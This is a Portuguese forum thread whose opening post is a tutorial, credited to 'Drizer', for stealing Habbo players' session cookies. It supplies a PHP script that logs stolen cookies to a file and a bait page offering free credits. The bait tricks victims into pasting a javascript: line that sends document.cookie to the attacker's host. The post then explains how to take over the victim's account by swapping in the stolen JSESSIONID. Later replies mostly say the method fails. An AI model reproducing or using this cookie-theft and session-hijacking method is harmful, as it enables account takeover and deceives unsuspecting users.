Xss / vulnerabilidade no security_check do habbo.

Olá
dia 22 foi descoberto uma vulnerabilidade no habbo, sendo que o "hacker" criando uma pagina mal-intencionada faça que os cookies da vitima seja enviada para ele!
TUTORIAL
1° Proucure um servidor que suporte php e rewrite
recomendo:
freewebhosting!
crie uma conta lá
selecione um endereço convicente para a pagina steal paasswrd
lá crie tudo direitinho e dps va em seu ftp...
o meu no caso é:
eu5org.freewebhostingarea.com/ftp/index.php
como selecionei o eu5.org server,
lá coloque eu5.org no 1° campo e no segudno seu site que criou e embaixo a senha...
entre...
crie um novo arquivo em new file no topo no lado direito da pagina...
no conteudo coloque
tire os

Código:

<?php
ob_start();
$cookie1=$_GET['cookie1'];
$cookie2=$_GET['cookie2'];
$handle=fopen('cookiejar.txt', 'a');
fwrite($handle, "Cookie: " .$cookie1.$cookie2. "\n");
fclose ($handle);

header("Location: http://habbo.com.br/me");
?>

salve com X.php
volte na setinha que tem na parte esquerda..
crie outro arquivo com o nome : cookiejar.txt
salve,
volte...
agora selecione o arquivo cookiejar.txt
e crique em permissões no topo lado direito
agora em chmod nas permissões coloque 777 salve e volte na setinha...
crie um arquivo com o nome de t.php e no conteudo coloque:
tire os
e mude o seusite.com para o site que vc colocou!

Código:

<title> Novo Bug </title>

<center>
<b>Copie o codigo abaixo e cole na sua pagina inicial e ganhe 99c!
<font color="red">
javascript:window.location='http://seusite.com/X.php?cookie1='%2bencodeURI(document·cookie.substring(0, 400))%2b'%26cookie2='%2bencodeURI(document·cookie.substring(401, 800));
</font>

agora mande para seus amigos:
seusite.com/t.php
mude seusite.com para o site que vc colokou na hora de cadastrar!
o bobo vai colokar o java na pagina e vai mandar a sessão para o arquivo: cookiejar.txt
va em:
seusite.com/cookiejar.txt
pegue a parte JSESSIONID=PEGUE ESSE CODIGO
va no firefox e baixe no site da mozzila o cookie editor
entre e uma conta fake,
va no cookies editor e mude o cookies jessionid para o da vitima salva o cookie e atualiza a pagina principal!
ta na conta da vitima!

Créditos: Drizer

Aff nem funfa,eu executei numa conta fake,n foi pro arquivo cookiejar.txt,e fui tentar entrar na conta fake pra testar denovo,a senha n dava mais,ou seja : Algem Hackeou '

'-' ainda bem q foi a fake '

Não funciona.

n intendi nada

No funfo '-'

Não Funciona :/

Aqui funciona ._. e J-Z se não funciona pode dar closed...

@edit
vocês baixaram o cookie editor no firefox?

Não dei closed '-'
OBS: Eles não tão falando que o Cookie Editor não funciona e sim que os cookies não chegam no cookiejar.txt

n prescisa dar closed

eu ainda to boiando no ki eh pra fazer

Phoenix, por favor apaga o tópico..
sim.. é o Drizer...

escreveu:Phoenix, por favor apaga o tópico..
sim.. é o Drizer...

No drizer eu confio, mais você não tá on line no habbo, pode ser qualquer trouxa ai me enganando...
Se for você mesmo malz ai então (:

ook

aff eu fiz tudo correto,mas entrei em fike e eu mesmo colei o codigo e tal,mas fui olhar tinha nada no arquivo cookiejar.txt,poderia corrigir algo errado ai,ou postar o topico denovo porem PERFEITO,vcs são os caras....

Onde fica esse cookies jessionid ? não achei

n fucional '

Aki não pegou tentei mais nem funfou tipo nao ta chegando os dados cookiejar.txt, nao chega nada na hora que envia lá

Funfa sim , o só que o habbo bloqueou o trafico de cookies então o jsessionid não pega mais .-.